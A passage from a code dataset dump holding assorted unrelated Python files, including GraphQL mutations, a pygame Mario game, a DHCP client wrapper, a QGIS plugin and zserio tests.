updateVenta.fechaVenta = fechaVenta\n \n db_session.session.add(updateVenta)\n db_session.session.commit()\n return actualizarVenta(updateVenta = updateVenta)\n\nclass actualizarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVentaDetalle = graphene.Int()\n idVenta = graphene.Int()\n idProducto = graphene.Int()\n cantidad = graphene.Int()\n \n updateDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVentaDetalle, idVenta, idProducto, cantidad):\n updateDetalleVenta = VentaDetalle.query.get(idVentaDetalle)\n\n updateDetalleVenta.idVenta = idVenta\n updateDetalleVenta.productoId = idProducto\n updateDetalleVenta.cantidad = cantidad\n\n db_session.session.add(updateDetalleVenta)\n db_session.session.commit()\n return actualizarDetalleVenta(updateDetalleVenta = updateDetalleVenta)\n\n# Eliminar\n\nclass eliminarProducto(graphene.Mutation):\n class Arguments:\n idProducto = graphene.Int()\n \n deleteProducto = graphene.Field(lambda: producObjeto)\n\n def mutate(self, info, idProducto):\n\n deleteProducto = Producto.query.get(idProducto)\n\n db_session.session.delete(deleteProducto)\n db_session.session.commit()\n return eliminarProducto(deleteProducto = deleteProducto)\n\nclass eliminarCliente(graphene.Mutation):\n class Arguments:\n idCliente = graphene.Int()\n \n deleteCliente = graphene.Field(lambda: clienteObjeto)\n \n def mutate(self,info, idCliente):\n deleteCliente = Cliente.query.get(idCliente)\n\n db_session.session.delete(deleteCliente)\n db_session.session.commit()\n return eliminarCliente(deleteCliente = deleteCliente)\n\nclass eliminarVenta(graphene.Mutation):\n class Arguments:\n ventaId = graphene.Int()\n\n deleteVenta = graphene.Field(lambda: ventaObjeto)\n\n def mutate(self, info, ventaId):\n deleteVenta = 
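# Each mutate() above repeats the db_session add/commit pair; a small helper
# (a sketch, assuming the same db_session import as this module) would remove
# that duplication:
def save(obj):
    db_session.session.add(obj)
    db_session.session.commit()
    return obj

# e.g.: return actualizarCliente(updateCliente=save(updateCliente))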
Venta.query.get(ventaId)\n \n db_session.session.delete(deleteVenta)\n db_session.session.commit()\n return eliminarVenta(deleteVenta = deleteVenta)\n\nclass eliminarDetalleVenta(graphene.Mutation):\n class Arguments:\n idVentaDetalle = graphene.Int()\n \n deleteDetalleVenta = graphene.Field(lambda: ventaDetalleObjeto)\n\n def mutate(self, info, idVentaDetalle):\n deleteDetalleVenta = VentaDetalle.query.get(idVentaDetalle)\n\n db_session.session.delete(deleteDetalleVenta)\n db_session.session.commit()\n return eliminarDetalleVenta(deleteDetalleVenta = deleteDetalleVenta)\n\nclass Mutation(graphene.ObjectType):\n addCliente = agregarCliente.Field()\n addProducto = agregarProducto.Field()\n addVenta = agregarVenta.Field()\n addVentaDetalle = agregarDetalleVenta.Field()\n updateProducto = actualizarProducto.Field()\n updateCliente = actualizarCliente.Field()\n updateVenta = actualizarVenta.Field()\n updateVentaDetalle = actualizarDetalleVenta.Field()\n deleteProducto = eliminarProducto.Field()\n deleteCliente = eliminarCliente.Field()\n deleteVenta = eliminarVenta.Field()\n deleteVentaDetalle = eliminarDetalleVenta.Field()","sub_path":"controlador/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":7750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"654039117","text":"def gcd( a , b ):\n if a < b:\n a,b = b,a\n if a%b == 0:\n return b\n return gcd( b , a%b )\n\ndef lcm( a , b ):\n return int( a/gcd(a,b) * b )\n\nif __name__ == \"__main__\":\n A,B = [int(x) for x in input().split()]\n print( lcm(A,B) )\n","sub_path":"01/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230184605","text":"import numpy\nimport matplotlib.pyplot as plt\n\na = [1, 2, 3, 4]\nx1 = numpy.array(a)\nprint(type(x1))\n\nx2 = numpy.arange(11)\nprint(x2)\n\n#x3 = numpy.loadtxt('', delimiter='', skiprows=1)\n\nN = 1000\nheight = [155, 160, 165, 170]\nweight = [50, 55, 60, 65]\nplt.scatter(height, weight)\nplt.show()\n","sub_path":"np1.py","file_name":"np1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476208257","text":"def judgePoint24(self, nums):\n if len(nums) == 1:\n return math.isclose(nums[0], 24)\n return any(self.judgePoint24([x] + [num for k, num in enumerate(nums) if k not in (i, j)])\n for i, a in enumerate(nums) for j, b in enumerate(nums) if i != j\n for x in {a + b, a * b, a - b, b - a, b and a / b, a and b / a})\n\n\n# Just go through all pairs of numbers a and b and replace them with a +\n# b, a * b, etc. Use recursion for the now smaller list. Positive base\n# case is the list being[24](or close enough).\n\n# I prevent division - by - zero by using b and a / b instead of just a /\n# b. If b is zero, then b and a / b is zero. And it's ok to have that\n# zero, since a*b is zero as well. It's not even a second zero, because\n# I'm creating a set of the up to six operation results, so duplicates are\n# ignored immediately.\n\n# Oh and note that I'm using Python 3, so / is \"true\" division, not\n# integer division like in Python 2. And it would be better to use\n# fractions.Fraction instead of floats. I actually just realized that\n# there is in fact an input where simple floats fail, namely [3, 3, 8, 8].\n# Floats calculate 23.999999999999989341858963598497211933135986328125\n# instead of 24. 
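# Quick check of the recursive gcd/lcm pair above against the standard
# library (math.gcd is available since Python 3.5):
import math

def gcd(a, b):
    return b if a % b == 0 else gcd(b, a % b)

def lcm(a, b):
    return a // math.gcd(a, b) * b

assert gcd(24, 36) == math.gcd(24, 36) == 12
assert lcm(4, 6) == 12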
It's not in the judge's test suite, but it should be\n# soon. Using Fraction however made my solution exceed the time limit, so\n# I settled for the above approximation solution.\n","sub_path":"problems/679.24_Game/stefan-104018_recursion.py","file_name":"stefan-104018_recursion.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620338529","text":"from data_loaders.utils import create_dataloader_test, create_dataloader_train_2d, create_dataloader_test_2d\nimport numpy as np\nimport os\nimport tensorflow as tf\nfrom configs.dataset_config import DatasetConfig\n\n\nclass HumanPoseDSLoader(object):\n def __init__(self):\n self.DATA_PATH = DatasetConfig.DATA_PATH\n self.TRAIN_BATCH_SIZE = DatasetConfig.TRAINBATCH_SIZE\n self.TEST_BATCH_SIZE = DatasetConfig.TESTBATCH_SIZE\n self.images_loader = None\n self.p3d_gt_loader = None\n self.p2d_gt_loader = None\n self.p3d_gt = None\n self.p2d_gt = None\n self.p3d_std = None\n self.p3d_mean = None\n self.image_paths = None\n self.num_joints = 17\n self.heatmap_size = np.array([64, 64])\n self.image_size = np.array([256, 256])\n self.use_different_joints_weight = True\n self.joints_weight = 1\n self.sigma = 2\n self.pose_loader = None\n\n def load_data_train_2d_heatmaps(self):\n data_loader, image_paths, annotations = create_dataloader_train_2d(data_root=self.DATA_PATH,\n batch_size=self.TRAIN_BATCH_SIZE)\n im_loader, p2d_gt_loader = data_loader\n self.images_loader = im_loader\n self.p2d_gt_loader = p2d_gt_loader\n self.image_paths = image_paths\n self.p3d_gt = annotations[\"pose3d\"]\n self.p2d_gt = annotations[\"pose2d\"]\n\n def load_data_test_images(self):\n data_loader, image_paths = create_dataloader_test(data_root=self.DATA_PATH, batch_size=self.TEST_BATCH_SIZE)\n # load mean and std\n im_loader = data_loader\n p3d_mean = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"mean.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"std.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = tf.constant(p3d_std)\n p3d_mean = tf.constant(p3d_mean)\n p3d_std = tf.tile(p3d_std, [self.TEST_BATCH_SIZE, 1, 1])\n p3d_mean = tf.tile(p3d_mean, [self.TEST_BATCH_SIZE, 1, 1])\n # normalize 3d pose\n self.images_loader = im_loader\n self.image_paths = image_paths\n self.p3d_std = p3d_std\n self.p3d_mean = p3d_mean\n\n def load_data_test_2d_pose(self, csv_file):\n data_loader = create_dataloader_test_2d(batch_size=self.TEST_BATCH_SIZE, csv_file=csv_file)\n # load mean and std\n pose_loader = data_loader\n p3d_mean = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"mean.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = np.loadtxt(os.path.join(self.DATA_PATH, 'annot', \"std.txt\")).reshape([1, 17, 3]).astype(np.float32)\n p3d_std = tf.constant(p3d_std)\n p3d_mean = tf.constant(p3d_mean)\n p3d_std = tf.tile(p3d_std, [self.TEST_BATCH_SIZE, 1, 1])\n p3d_mean = tf.tile(p3d_mean, [self.TEST_BATCH_SIZE, 1, 1])\n # normalize 3d pose\n self.pose_loader = pose_loader\n self.p3d_std = p3d_std\n self.p3d_mean = p3d_mean\n\n\n\n","sub_path":"data_loaders/human_pose_ds_loader.py","file_name":"human_pose_ds_loader.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415319724","text":"import sys, pygame\nfrom pygame.locals import *\nfrom time import clock\n \n#Tamaño la pantalla\nWIDTH = 900\nHEIGHT = 500\n\nMposX 
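# The [3, 3, 8, 8] case the comment above describes, done exactly with
# fractions.Fraction: 8 / (3 - 8/3) is 24 on the nose, while the float
# version only gets within isclose() tolerance.
from fractions import Fraction
import math

exact = Fraction(8) / (3 - Fraction(8, 3))
assert exact == 24                         # rationals: no rounding at all
approx = 8 / (3 - 8 / 3)
assert approx != 24 and math.isclose(approx, 24)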
=300\nMposY =318\n\ncont=6\ndirec=True\ni=0\n \nbajada=False\nsalto = False\ntiempo=180##el tiempo del juego que va aser de 3 minutos para pasar el nivle\n\n\ndef Initialize():\n global screen, clock,xixf,Rxixf\n pygame.init() \n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Mario\")\n clock = pygame.time.Clock()\n xixf={}\n Rxixf={}\n xixf[0]=(0,0,20,41)\n xixf[1]=(22,0,25,41)\n xixf[2]=(47,0,25,41)\n xixf[3]=(73,0,20,41)\n xixf[4]=(93,0,27,41)\n xixf[5]=(120,0,27,41)\n Rxixf[0]=(122,0,22,41)\n Rxixf[1]=(96,0,25,41)\n Rxixf[2]=(74,0,22,41)\n Rxixf[3]=(50,0,23,41)\n Rxixf[4]=(24,0,26,41)\n Rxixf[5]=(0,0,25,41)\n \n \ndef LoadContent():\n global fondo, mario,mario_inv,enemig \n fondo = imagen(\"imagenes/fondo.png\") \n mario = imagen(\"imagenes/sprites_mario.png\",True) \n mario_inv=pygame.transform.flip(mario,True,False);\n fondo = pygame.transform.scale(fondo, (1000, 400))\n \n \ndef Updates(): \n teclado() \n #Escenario\n sprite_M() \n #Enemigo()\n #Coliciones()\n \n\ndef Draw():\n global salto,salto_Par, salto,bajada_Par,bajada\n screen.blit(fondo, (0, 0))\n global MposX,MposY\n if direc==True and salto==False :\n screen.blit(mario, ( MposX, MposY),(xixf[i]))\n \n if direc==False and salto==False :\n screen.blit(mario_inv, ( MposX, MposY),(Rxixf[i]))\n \n \n #salto normal y Parabolico\n if salto==True: \n \n if direc==True:\n screen.blit(mario, ( MposX, MposY),(xixf[4]))\n if direc==False:\n screen.blit(mario_inv, ( MposX, MposY),(Rxixf[4])) \n \n if bajada==False:\n MposY-=4 \n \n if bajada==True:\n MposY+=4 \n \n if MposY<=186:\n bajada=True\n \n if MposY>=318:\n bajada=False\n salto=False\n #============================== \n\n \n #pygame.display.flip()\n \n#=================IMAGEN====================================\ndef imagen(filename, transparent=False):##Enviamos para imagen,si no se especifica la tranparencia es falso\n try: image = pygame.image.load(filename)##si tenemos algun error al cargar de archivos Filename = es la ruta de nuestro archivo \n except pygame.error as message:##si existe erro con el algun mensaje a consola\n raise SystemExit(message)\n image = image.convert()##va a convertir la imagen a formato interno de python para que sea mas factible para el interprete manejar a la imagen\n if transparent:## si transparente = true\n color = image.get_at((0,0))##obtener el color que se encuentra en la parte superior izquierda\n image.set_colorkey(color, RLEACCEL)## no se va a mostrar el color \n return image\n \n#======================TECLADO===================================\ndef teclado():\n global cont, direc,salto,MposX\n teclado = pygame.key.get_pressed()\n if teclado[K_UP]:\n salto=True\n sonido= pygame.mixer.Sound(\"Sonidos/salto.wav\")\n sonido.play();\n \n \n if teclado[K_RIGHT]:\n if MposX<=810:\n MposX+=2\n cont+=1\n direc=True\n \n \n \n elif teclado[K_LEFT]:\n if MposX>10:\n MposX-=2\n print(MposX)\n cont+=1\n direc=False\n \n else :\n cont=6\n \n # Cerrar la ventana\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n#===================SPRITE===============================\ndef sprite_M():\n global cont \n p=6\n global i\n if cont==p:\n i=0\n if cont==p*2:\n i=1\n if cont==p*3:\n i=2\n if cont==p*4:\n i=3\n if cont==p*5:\n i=4\n if cont==p*6:\n i=5\n cont=0\n\n \ndef main():\n Initialize()\n LoadContent()\n pygame.mixer.music.load(\"Sonidos/Mario.mp3\")#llamada a la musica\n pygame.mixer.music.play(-1)\n enemigos=[]\n enemigos.append(250)\n fuente1 = 
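# The if-chain in sprite_M() steps the frame index i through 0..5 at every
# multiple of p; the same mapping at those boundaries can be written
# arithmetically (a sketch, using the module's p = 6 step):
p = 6

def frame_for(cont):
    return (cont // p - 1) % 6

assert [frame_for(p * k) for k in range(1, 7)] == [0, 1, 2, 3, 4, 5]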
pygame.font.SysFont(\"Arial\",20,True,False)\n vidas=3\n puntaje=1\n\n while True:\n time = clock.tick(60)\n Updates()\n Draw()\n LoadContent()\n \n segundos=tiempo-pygame.time.get_ticks()/1000\n segundos=int(segundos)##transformamos la imagen a int\n segundos=\"Timpo: \"+str(segundos)##la transformamos a texto para poderla imprimir en pantalla\n contador=fuente1.render(segundos,0,(0,0,230))##imprimimos nuestro contador de tiempo\n vid=\"Vidas: \"+str(vidas)\n vids=fuente1.render(vid,0,(0,0,230))\n puntaje=puntaje+0.1\n ##puntaje=int(puntaje)\n punt=\"Puntaje: \"+str(puntaje)\n punts=fuente1.render(punt,0,(0,0,230))\n screen.blit(vids,(100,5))##Imprime el tiempo del jueg\n screen.blit(contador,(0,5))##Imprime el tiempo del jueg\n screen.blit(punts,(200,5))##Imprime el tiempo del jueg\n\n pygame.display.flip()\n \n \nmain()\n","sub_path":"Mario Bros/Mario final/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114279203","text":"import unittest\n\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass ArraysMappingTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"array_types.zs\").arrays_mapping\n\n def testUnsignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setUint8Array(intArray)\n arraysMapping.setUint16Array(intArray)\n arraysMapping.setUint32Array(intArray)\n arraysMapping.setUint64Array(intArray)\n\n def testSignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setInt8Array(intArray)\n arraysMapping.setInt16Array(intArray)\n arraysMapping.setInt32Array(intArray)\n arraysMapping.setInt64Array(intArray)\n\n def testUnsignedBitfieldArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setBitfield8Array(intArray)\n arraysMapping.setBitfield16Array(intArray)\n arraysMapping.setBitfield32Array(intArray)\n arraysMapping.setBitfield63Array(intArray)\n arraysMapping.setUint8Value(8)\n arraysMapping.setVariableBitfieldLongArray(intArray)\n arraysMapping.setVariableBitfieldIntArray(intArray)\n arraysMapping.setVariableBitfieldShortArray(intArray)\n arraysMapping.setVariableBitfieldByteArray(intArray)\n\n def testSignedBitfieldArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setIntfield8Array(intArray)\n arraysMapping.setIntfield16Array(intArray)\n arraysMapping.setIntfield32Array(intArray)\n arraysMapping.setIntfield64Array(intArray)\n arraysMapping.setUint8Value(8)\n arraysMapping.setVariableIntfieldLongArray(intArray)\n arraysMapping.setVariableIntfieldIntArray(intArray)\n arraysMapping.setVariableIntfieldShortArray(intArray)\n arraysMapping.setVariableIntfieldByteArray(intArray)\n\n def testFloatArrays(self):\n arraysMapping = self.api.ArraysMapping()\n floatArray = [i / (i + 1) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setFloat16Array(floatArray)\n arraysMapping.setFloat32Array(floatArray)\n arraysMapping.setFloat64Array(floatArray)\n\n def testVariableUnsignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setVaruint16Array(intArray)\n arraysMapping.setVaruint32Array(intArray)\n 
arraysMapping.setVaruint64Array(intArray)\n arraysMapping.setVaruintArray(intArray)\n arraysMapping.setVarsizeArray(intArray)\n\n def testVariableSignedIntegerArrays(self):\n arraysMapping = self.api.ArraysMapping()\n intArray = list(range(self.FIXED_ARRAY_LENGTH))\n\n arraysMapping.setVarint16Array(intArray)\n arraysMapping.setVarint32Array(intArray)\n arraysMapping.setVarint64Array(intArray)\n arraysMapping.setVarintArray(intArray)\n\n def testBoolArray(self):\n arraysMapping = self.api.ArraysMapping()\n boolArray = [i % 2 == 0 for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setBoolArray(boolArray)\n\n def testStringArrays(self):\n arraysMapping = self.api.ArraysMapping()\n stringArray = [\"Test\" + str(i) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setStringArray(stringArray)\n\n def testExternArrays(self):\n arraysMapping = self.api.ArraysMapping()\n externArray = [zserio.BitBuffer(bytes([0xCD, 0x03]), 10)\n for i in range(self.FIXED_ARRAY_LENGTH)]\n arraysMapping.setExternArray(externArray)\n\n def testCompoundArray(self):\n arraysMapping = self.api.ArraysMapping()\n compoundArray = [self.api.TestStructure() for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setCompoundArray(compoundArray)\n\n def testEnumArray(self):\n arraysMapping = self.api.ArraysMapping()\n enumArray = [self.api.TestEnum(self.api.TestEnum.VALUE1) for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setEnumArray(enumArray)\n\n def testBitmaskArray(self):\n arraysMapping = self.api.ArraysMapping()\n bitmaskArray = [self.api.TestBitmask.Values.MASK1 for i in range(self.FIXED_ARRAY_LENGTH)]\n\n arraysMapping.setBitmaskArray(bitmaskArray)\n\n FIXED_ARRAY_LENGTH = 5\n","sub_path":"test/language/array_types/python/ArraysMappingTest.py","file_name":"ArraysMappingTest.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"389848976","text":"from enum import Enum\nimport ipaddress\nimport json\nimport struct\nimport binascii\nimport os\nfrom os import path\nfrom select import select\nimport threading\nimport subprocess\nimport logging\n\nfrom eventfd import EventFD\nimport posix_ipc\n\nHANDLER_SCRIPT = path.join(path.dirname(__file__), 'udhcpc_handler.py')\nAWAIT_INTERVAL = 0.1\nVENDOR_ID = 'docker'\n\nclass EventType(Enum):\n BOUND = 'bound'\n RENEW = 'renew'\n DECONFIG = 'deconfig'\n LEASEFAIL = 'leasefail'\n\nlogger = logging.getLogger('net-dhcp')\n\nclass DHCPClientError(Exception):\n pass\n\ndef _nspopen_wrapper(netns):\n return lambda cmd, *args, **kwargs: subprocess.Popen(['nsenter', f'-n{netns}', '--'] + cmd, *args, **kwargs)\nclass DHCPClient:\n def __init__(self, iface, v6=False, once=False, hostname=None, event_listener=None):\n self.iface = iface\n self.v6 = v6\n self.once = once\n self.event_listeners = [DHCPClient._attr_listener]\n if event_listener:\n self.event_listeners.append(event_listener)\n\n self.netns = None\n if 'netns' in iface:\n self.netns = iface['netns']\n logger.debug('udhcpc using netns %s', self.netns)\n\n Popen = _nspopen_wrapper(self.netns) if self.netns else subprocess.Popen\n bin_path = '/usr/bin/udhcpc6' if v6 else '/sbin/udhcpc'\n cmdline = [bin_path, '-s', HANDLER_SCRIPT, '-i', iface['ifname'], '-f']\n cmdline.append('-q' if once else '-R')\n if hostname:\n cmdline.append('-x')\n if v6:\n # TODO: We encode the fqdn for DHCPv6 because udhcpc6 seems to be broken\n # flags: S bit set (see RFC4704)\n enc_hostname = hostname.encode('utf-8')\n enc_hostname = 
struct.pack('BB', 0b0001, len(enc_hostname)) + enc_hostname\n enc_hostname = binascii.hexlify(enc_hostname).decode('ascii')\n hostname_opt = f'0x27:{enc_hostname}'\n else:\n hostname_opt = f'hostname:{hostname}'\n cmdline.append(hostname_opt)\n if not v6:\n cmdline += ['-V', VENDOR_ID]\n\n self._suffix = '6' if v6 else ''\n self._event_queue = posix_ipc.MessageQueue(f'/udhcpc{self._suffix}_{iface[\"address\"].replace(\":\", \"_\")}', \\\n flags=os.O_CREAT | os.O_EXCL, max_messages=2, max_message_size=1024)\n self.proc = Popen(cmdline, env={'EVENT_QUEUE': self._event_queue.name}, stdin=subprocess.DEVNULL,\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n if hostname:\n logger.debug('[udhcpc%s#%d] using hostname \"%s\"', self._suffix, self.proc.pid, hostname)\n\n self._has_lease = threading.Event()\n self.ip = None\n self.gateway = None\n self.domain = None\n\n self._shutdown_event = EventFD()\n self.shutdown = False\n self._event_thread = threading.Thread(target=self._read_events)\n self._event_thread.start()\n\n def _attr_listener(self, event_type, event):\n if event_type in (EventType.BOUND, EventType.RENEW):\n self.ip = ipaddress.ip_interface(event['ip'])\n if 'gateway' in event:\n self.gateway = ipaddress.ip_address(event['gateway'])\n else:\n self.gateway = None\n self.domain = event.get('domain')\n self._has_lease.set()\n elif event_type == EventType.DECONFIG:\n self._has_lease.clear()\n self.ip = None\n self.gateway = None\n self.domain = None\n\n def _read_events(self):\n while True:\n r, _w, _e = select([self._shutdown_event, self._event_queue.mqd], [], [])\n if self._shutdown_event in r:\n break\n\n msg, _priority = self._event_queue.receive()\n event = json.loads(msg.decode('utf-8'))\n try:\n event['type'] = EventType(event['type'])\n except ValueError:\n logger.warning('udhcpc%s#%d unknown event \"%s\"', self._suffix, self.proc.pid, event)\n continue\n\n logger.debug('[udhcp%s#%d event] %s', self._suffix, self.proc.pid, event)\n for listener in self.event_listeners:\n try:\n listener(self, event['type'], event)\n except Exception as ex:\n logger.exception(ex)\n self.shutdown = True\n del self._shutdown_event\n\n def await_ip(self, timeout=10):\n if not self._has_lease.wait(timeout=timeout):\n raise DHCPClientError(f'Timed out waiting for lease from udhcpc{self._suffix}')\n\n return self.ip\n\n def finish(self, timeout=5):\n if self.shutdown or self._shutdown_event.is_set():\n return\n\n try:\n if self.proc.returncode is not None and (not self.once or self.proc.returncode != 0):\n raise DHCPClientError(f'udhcpc{self._suffix} exited early with code {self.proc.returncode}')\n if self.once:\n self.await_ip()\n else:\n self.proc.terminate()\n\n if self.proc.wait(timeout=timeout) != 0:\n raise DHCPClientError(f'udhcpc{self._suffix} exited with non-zero exit code {self.proc.returncode}')\n\n return self.ip\n finally:\n self._shutdown_event.set()\n self._event_thread.join()\n self._event_queue.close()\n self._event_queue.unlink()\n","sub_path":"net-dhcp/udhcpc.py","file_name":"udhcpc.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423236555","text":"# -*- coding: utf-8 -*-\n'''\n/***************************************************************************\n Historisation\n A QGIS plugin\n Historisation par SITN\n -------------------\n begin : 2019-08-01\n git sha : $Format:%H$\n copyright : (C) 2015 by arx iT\n email : mba@arxit.com\n 
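# Worked example of the DHCPv6 FQDN option assembled above: one flag byte
# with the S bit set (RFC 4704), one length byte, the UTF-8 name, all
# hexlified into udhcpc6's "0x27:<hex>" -x syntax.
import struct, binascii

hostname = b"myhost"
blob = struct.pack("BB", 0b0001, len(hostname)) + hostname
opt = "0x27:" + binascii.hexlify(blob).decode("ascii")
assert opt == "0x27:01066d79686f7374"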
***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n'''\nfrom __future__ import absolute_import\nfrom builtins import object\nfrom qgis.core import *\nfrom qgis.PyQt.QtCore import QSettings, QTranslator, qVersion, QCoreApplication\nfrom qgis.PyQt.QtWidgets import QAction, QPushButton, QMenu\nfrom qgis.PyQt.QtGui import QIcon\n# Initialize Qt resources from file resources.py\nfrom . import resources\nfrom .project import *\nfrom .settings import defineDBSettings\n\n# Import the code for the dialog\nimport os.path\n\n# Global variables\nPLUGIN_DIR = os.path.dirname(__file__)\n\n\nclass Historisation(object):\n '''\n QGIS Plugin Implementation.\n '''\n\n def __init__(self, iface):\n '''Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n '''\n\n # Save reference to the QGIS interface\n self.iface = iface\n\n # Register custom editors widgets\n\n # Declare instance attributes\n self.actions = []\n self.temp_actions = []\n self.menu = u'&Historisation'\n\n # Toolbar initialization\n self.toolbar = self.iface.addToolBar(u'Historisation')\n self.toolbar.setObjectName(u'Historisation')\n\n # QGIS interface hooks\n self.iface.projectRead.connect(self.onProjectOpened)\n self.iface.newProjectCreated.connect(self.onProjectOpened)\n\n # Load current project\n self.current_project = Project(self.iface)\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n '''Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. 
Note that the action is also\n added to self.actions list.\n :rtype: QAction\n '''\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n if callback is not None:\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n '''\n Create the menu entries and toolbar icons inside the QGIS GUI.\n '''\n\n definedDB = QSettings().value(\"HistorisationSITN/DB\", None)\n enable_button = False\n if definedDB:\n enable_button = True\n\n # New project\n self.add_action(\n ':/plugins/Historisation/widgets/configuration/icon.png',\n text=u'Activer l\\'historisation sur la couche',\n callback=self.onConfigurationButtonClicked,\n status_tip=u'Activer l\\'historisation sur la couche',\n enabled_flag=enable_button,\n parent=self.iface.mainWindow())\n\n self.add_action(\n ':/plugins/Historisation/widgets/configuration/icon_settings.png',\n text=u'Définir les paramètres de connexion à la BD',\n callback=self.onSettingsButtonClicked,\n status_tip=u'Définir les paramètres de connexion à la BD',\n parent=self.iface.mainWindow())\n\n\n # Update buttons availability\n self.updateGui()\n\n def updateGui(self):\n '''\n Updates the plugin GUI\n Disable buttons\n '''\n enabled = True\n\n for action in self.temp_actions:\n action.setEnabled(enabled)\n\n def onProjectOpened(self):\n self.current_project = Project(self.iface)\n\n def onConfigurationButtonClicked(self):\n if not self.current_project:\n return\n\n self.current_project.activateHistoryOnSelectedLayer()\n\n def onSettingsButtonClicked(self):\n\n defineDBSettings(self)\n\n def unload(self):\n '''\n Removes the plugin menu item and icon from QGIS GUI.\n '''\n\n for action in self.actions:\n self.iface.removePluginMenu(\n self.menu,\n action)\n self.iface.removeToolBarIcon(action)\n\n # remove the toolbar\n del self.toolbar\n\n # Disconnect Signals\n self.iface.projectRead.disconnect(self.onProjectOpened)\n self.iface.newProjectCreated.disconnect(self.onProjectOpened)\n","sub_path":"Historisation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"25316360","text":"from gluoncv.data.transforms import video\nfrom gluoncv.data import VideoClsCustom\ndef video_transform(root, video_path, train=False, test_mode=False):\n if train == True:\n transform_train = video.VideoGroupTrainTransform(size=(224, 224), scale_ratios=[1.0, 0.8], mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n train_dataset = VideoClsCustom(root=root,\n setting=video_path,\n train=True,\n test_mode=False,\n #num_segments=3,\n new_length=8,\n transform=transform_train,\n #video_loader=True,\n #use_decord=True\n )\n print('Load %d training samples.' % len(train_dataset))\n\n elif train == False and test_mode == 